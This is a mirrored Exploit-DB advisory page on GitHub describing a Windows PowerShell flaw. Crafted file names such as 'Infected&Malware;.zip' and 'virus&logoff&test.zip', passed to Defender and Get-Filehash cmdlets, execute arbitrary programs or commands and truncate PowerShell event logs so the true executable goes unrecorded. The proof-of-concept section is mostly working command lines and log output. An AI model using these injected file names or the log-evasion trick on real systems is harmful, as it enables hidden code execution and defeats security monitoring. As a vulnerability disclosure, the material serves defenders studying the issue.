bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows_x86-64/local/51843.txt
Exploit-DB 7ef8e488d8 DB: 2024-03-04 
22 changes to exploits/shellcodes/ghdb

GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit
GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit

Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)

R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure

TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution

TPC-110W - Missing Authentication for Critical Function

A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc

Easywall 0.3.1 - Authenticated Remote Command Execution

Magento ver. 2.4.6 - XSLT Server Side Injection

AC Repair and Services System v1.0 - Multiple SQL Injection

Enrollment System v1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload

Real Estate Management System v1.0 - Remote Code Execution via File Upload
Simple Student Attendance System v1.0 -  'classid' Time Based Blind & Union Based SQL Injection
Simple Student Attendance System v1.0 - Time Based Blind SQL Injection

Boss Mini 1.4.0 - local file inclusion

Windows PowerShell - Event Log Bypass Single Quote Code Execution
2024-03-04 00:16:34 +00:00

131 lines
No EOL
5.2 KiB
Text
Raw Blame History

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Windows PowerShell
Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.
[Vulnerability Type]
PowerShell Single Quote Code Execution / Event Log Bypass
[CVE Reference]
N/A
[Security Issue]
In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.
This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure.
On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution.
However, if the filename gets wrapped in single quotes it failed, that is until now.
[Single Quote Code Exec Bypass]
Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.
The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated.
Take the following three test cases using Defender API which takes a specially crafted filename.
C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"
1) Double quotes OK
"Test;saps DOOM;.xml"
2) Single quotes FAILS
'Test;saps DOOM;.xml'
3) Single quotes BYPASS
'Test&DOOM;.xml'
PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands.
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'
Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here
and that it also excludes the .EXE portion in that filename.
[PS Event Log Bypass]
On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes.
However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.
Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)
C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5
Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating.
[PS Log ID 403 Snippet]
Engine state is changed from Available to Stopped.
Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=25
HostName=ConsoleHost
HostVersion=5.1.19041.1682
HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
HostApplication=powershell get-filehash 'Infected
EngineVersion=5.1.19041.1682
[Exploit/POC]
powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5
Run some malware plus bypass logging of true file name:
C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5
PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.
Defender Anti-Malware API:
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'
Call ping cmd using double "&":
C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5
Call a Windows cmd to Logoff the victim:
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'
We have options:
A) to call commands use double "&" --> 'virus&logoff&test.zip'
B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'
[References]
https://github.com/hyp3rlinx/PSTrojanFile
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification: circa 2019
December 27, 2023 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Reference in a new issue View git blame Copy permalink